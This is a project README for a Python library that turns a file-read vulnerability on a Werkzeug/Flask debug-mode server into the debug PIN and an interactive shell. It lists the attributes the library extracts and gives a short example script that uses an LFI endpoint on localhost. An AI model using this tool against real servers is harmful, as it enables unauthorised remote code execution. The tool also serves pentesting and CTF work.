/wconsole_extractor

WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode. You just have to write a python function that leaks a file content and you have your shell :)

Primary LanguagePythonMIT LicenseMIT

Welcome to WConsole Extractor 👋

Version License: MIT Twitter: Ruulian_

Wconsole Extractor is a library which allows to automatically exploit a flask debug mode server. You just need to write a file leak function, pass it to the class WConsoleExtractor constructor and you can access to all the elements related to the debug mode. Moreover, you can call the shell function to obtain an interactive shell.

✨ Demo

example_gif

🔨 Install

From PyPi

Global installation:

pip3 install wconsole-extractor

Python virtual environment:

python3 -m venv env
source env/bin/activate
pip3 install wconsole-extractor

# Deactivate environment
deactivate

Installation from repository

Global installation:

git clone https://github.com/Ruulian/wconsole_extractor.git
cd wconsole_extractor
pip3 install .

Python virtual environment:

git clone https://github.com/Ruulian/wconsole_extractor.git
cd wconsole_extractor
python3 -m venv env
source env/bin/activate
pip3 install .

# Deactivate environment
deactivate

📚 Documentation

Note: The target operating system must be a Linux distribution.

Prerequisites

In order to use correctly the library, you need to have an arbitrary file read on the target and implement it in python.

You must write a function that takes a filename as parameter and returns the content of the file on the target. If the file is not found, the function should return an empty string.

Available attributes

From WconsoleExtractor instance, you can access mutiple attributes:

# Target information
extractor.target               # Specified target
extractor.base_url             # Target base url
extractor.hostname             # hostname

# Versions
extractor.python_version       # Python version
extractor.werkzeug_version     # Werkzeug version

# Probably public bits
extractor.username             # User who launched the application
extractor.flask_path           # Flask installation path
extractor.modname              # Constant "flask.app"
extractor.class_name           # Constant "Flask"
extractor.probably_public_bits # Probably public bits [username, modname, class_name, flask_path]

# Private bits
extractor.machine_id           # Machine id
extractor.uuidnode             # MAC address in decimal
extractor.private_bits         # private bits

# Post process information
extractor.pin_code             # Werkzeug PIN CODE
extractor.token                # Werkzeug console token (available in HTML source code)

# Functions
extractor.shell()              # Get interactive shell

Example

from wconsole_extractor import WConsoleExtractor, info
import requests

def leak_function(filename) -> str:
    r = requests.get(f"http://localhost:5000/lfi?path={filename}")
    if r.status_code == 200:
        return r.text
    else:
        return ""

extractor = WConsoleExtractor(
    target="http://localhost:5000",
    leak_function=leak_function
)


info(f"PIN CODE: {extractor.pin_code}")
extractor.shell()

Author

👤 Ruulian

🤝 Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page.

Show your support

Give a ⭐️ if this project helped you!

📝 License

This project is MIT licensed.


This README was generated with ❤️ by readme-md-generator